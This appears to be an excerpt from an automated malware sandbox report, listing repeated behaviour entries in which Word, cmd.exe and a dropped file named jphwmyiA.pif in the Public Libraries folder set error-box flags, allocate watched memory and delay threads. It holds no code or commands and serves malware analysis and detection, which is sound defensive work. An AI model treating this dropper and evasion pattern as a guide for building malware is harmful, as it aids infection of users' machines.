Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\Public\Libraries\jphwmyiA.pif	Memory allocated: 26000000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Memory allocated: 261D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Memory allocated: 281D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Memory allocated: 1A2E0000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Memory allocated: 1A450000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Memory allocated: 1C450000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Memory allocated: 2A170000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Memory allocated: 2A3C0000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Memory allocated: 2A310000 memory reserve \| memory write watch

Source: C:\Users\Public\Libraries\jphwmyiA.pif

12_2_004019F0

Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599825	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599663	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599538	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599424	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599204	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598981	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598606	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598486	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598368	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598246	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598133	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597905	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597796	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597686	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597577	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597358	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597249	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597139	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597030	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596921	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596811	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596702	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596589	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596483	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596374	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596226	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596074	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595952	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595843	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595733	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595624	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595515	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595405	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595289	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595171	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595061	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594952	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594843	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594732	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594608	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594473	Jump to behavior
